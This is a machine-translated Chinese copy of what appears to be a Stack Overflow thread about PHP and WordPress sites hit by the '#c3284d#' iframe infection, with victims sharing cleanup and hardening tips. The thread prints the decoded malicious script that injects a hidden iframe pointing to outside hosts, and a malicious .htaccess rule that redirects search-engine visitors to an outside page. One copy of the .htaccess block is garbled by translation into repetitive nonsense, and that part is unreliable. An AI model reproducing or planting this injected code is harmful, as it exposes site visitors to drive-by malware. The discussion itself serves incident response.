Fatal编程技术网
  • php/
  • Php 网站iframe攻击-将代码插入源代码

Php 网站iframe攻击-将代码插入源代码

php iframe

Php 网站iframe攻击-将代码插入源代码,php,iframe,code-injection,Php,Iframe,Code Injection,在过去的几天里,我的网站一再成为iframe攻击的目标。代码主要附加到PHP和Javascript页面。然后对代码进行PHPBASE64编码,参见示例(我稍微更改了代码以消除它): 解码后的图像如下所示: <script type="text/javascript"> document.write( '<iframe src="http://opticmoxie.com/xxxxxxx.php" name="Twitter"

在过去的几天里,我的网站一再成为iframe攻击的目标。代码主要附加到PHP和Javascript页面。然后对代码进行PHPBASE64编码,参见示例(我稍微更改了代码以消除它):

解码后的图像如下所示:

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php"     
         name="Twitter" scrolling="auto" frameborder="no" 
         align="center" height="2" width="2"></iframe>'
    );


document.write(
''
);

一个共同点是所有代码都有注释“#c3284d#”,因此追踪恶意代码并不困难。但这很费时

我们在Gradwell(英国)的共享服务器上,他们并没有特别的帮助。 所以问题是我能做些什么来阻止这个问题重演? 我知道MySQL注入攻击,并使用PHP的MySQL_real_escape_字符串来防范此类攻击

该网站是PHP和MySQL驱动器。 我们使用MySQLFTP并有一个shell帐户用于SSH访问。
我们使用Wordpress(最新更新,插件已停用)。

我也有同样的问题。在我的例子中,附加的代码是

<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


文件。写(“”);
此外,还有一个.htaccess文件,如下所示:

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#

#c3284d#RewriteCond%{HTTP_REFERER}上的RewriteEngine
> ^.*(ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ADB)ADB)ADB)ADD)行政管理层(ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA)ABA A A A)A)A A A)A A A A A A)A A A A A)A A)A)A)A A)A)A)A)A A A)A)A)A A)A)A)A)A)A)A)A)A)A)A)A A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A)A U | claymont | Click4选择| clickey | clickz | clush | confex |网络内容|水仙花| devaro | dmoz |狗堆| eb(1244)埃霍霍(E1244)埃霍霍(E1244)埃霍霍(E1244)埃霍霍霍(E1244)埃霍霍(E1244)埃霍霍(E1244)埃霍霍(E1244)埃霍霍(E1244)埃霍霍(E1244)埃尼罗(E1244)埃霍霍霍(埃霍霍霍)埃霍(埃埃霍)埃埃霍)埃霍(EnRo统筹统筹统筹统筹)埃霍霍霍(EE统筹统筹统筹)埃霍霍(埃霍霍霍)埃霍霍霍(E统筹统筹统筹)埃霍(E统筹统筹统筹)欧元欧元欧元欧元欧元欧元欧元欧元欧元)欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元,欧洲寻求寻求寻求寻求寻求寻求寻求欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元欧元寻求寻求寻求寻求寻求寻求寻求寻求寻求寻求(1244)考试考试考试考试考试(考试考试考试考试考试考试考试考试考试考试考试124; goto | gulesider | hispavista | hotbot | hotfrog | icq | Isearch | ilse | infoseek |爱尔兰信息|(12)JaJaJa12快快死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死|黑人| nlsearch | nol9 | oekoportal | openstat | orange | passagen | Pocketfiler | qp | qq | rambler | rtl | savio | schnellsuche | searc搜索比利时的h.1244搜索比利时的搜索引擎,搜索比利时的搜索引擎,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索比利时,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,搜索者,简单搜索者,搜索者,搜索者,滑块,滑动者,滑动者,滑动者,滑动者,滑动者,滑块,溶胶,溶胶,斯普普,斯普展,搜索者,搜索者,搜索者,搜索者,搜索者,斯普,斯普展,喷涂,喷涂,喷涂,喷涂,搜索者,喷涂,喷涂,搜索者,搜索者,搜索者,搜索者,搜索者,搜索,搜索者,搜索者,搜索者,搜索者,搜索,搜索者,搜索者,搜索者,搜索者,搜索,搜索者,搜索者,搜索,搜索者,搜索者,搜索者,搜索者,搜索者,搜索,搜索,124;上平|推特| ukkey | uwe | verygoodsearch | vkontakte |瞧| walhello | wanadoo | web | webalta|web archiv | webcrawler | websuche | westaustraliaonline |维基百科| wisenut | witch |卧龙| yahoo | yandex | yell | yippy | youtube | zoneru | | | | zoneru | |)(*))
>重写规则^(.*)$http://onestopchinasource.com/catalog/stats.php
>[R=301,L]
>#/c3284d#
我发现了两篇关于这个问题的文章: 及

希望有帮助。

我也有同样的问题。FTP服务器的访问日志显示修改是使用被黑客攻击的FTP密码进行的。

我有相同的问题,在许多不同的域上有不同的被黑客攻击的文件。我注意到的一个常见问题是Wordpress。我们在许多服务器上都有Wordpress,我认为这就是常见的罪魁祸首。我已经更新了我所有的wordpress帐户,更改了所有域帐户的所有pWord。不确定问题是否已完全解决。

我遇到了相同的问题,但进入了wordpress网站

我猜这个网站是通过这些小部件感染的,因为我使用了一个允许执行PHP代码的插件

我的最佳解决方案是:

  • 消除可疑部件
  • 查看一个受感染文件的时间和日期(我的案例:header.php)
  • 清除所有受感染的文件(在我的情况下,我有网站的备份)
  • 在日志文件中搜索当时可疑的IP(搜索黑名单上发现的IP)
  • 安装一个插件以禁止可疑IP
从那一刻起,问题就消失了。我希望这会对你有所帮助。

在我管理的所有Wordpress网站上都有相同的问题。我没有找到感染源,我打赌是我的电脑上有蠕虫,或者是我在所有网站上安装的插件

我在WP Better security插件日志中找到了所有被修改的文件,并删除了其他受感染的代码,在我对所有感染源文件进行chmod 444之后

现在我已经自由了,因为一个月的邪恶iframes/hTaces和其他东西。

我也有同样的问题,发现他们用来进入的方法是一个被黑客入侵的ftp密码

尽管这是在启用CPHulk暴力保护的cPanel服务器上运行的,但我发现黑客试图通过数千个不同的受损主机进行暴力入侵

幸运的是,我有一个上传的所有文件的日志,所以我写了一个脚本从备份中恢复这些文件

然后,我通过减少锁定帐户前所需的失败尝试次数,提高了cPanel暴力保护级别。

我建议您看看这个:

它还有一个脚本来清理它。

坏人可以访问你的代码,因此你必须关闭他们的访问权限,同时你可以使用一个简单的脚本检查并删除它检测到的所有行(base64_解码,但即使是最好的代码(带有备份文件的校验和检查器)写这篇文章后不久,我再次被恶意软件攻击。但是自从更改我的FTP、SSH和MySQL密码后,我没有任何进一步的问题。我同意这篇文章。共享主机只会导致问题。我现在已经打开了一个虚拟专用服务器帐户。有很多PHP知识表明,exi关于这类问题,我鼓励你去寻找它。然而,这个问题的横向思考答案是“PHP比其他语言更容易出现安全问题。这是一个老问题,但仍然是一个问题。” 
> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#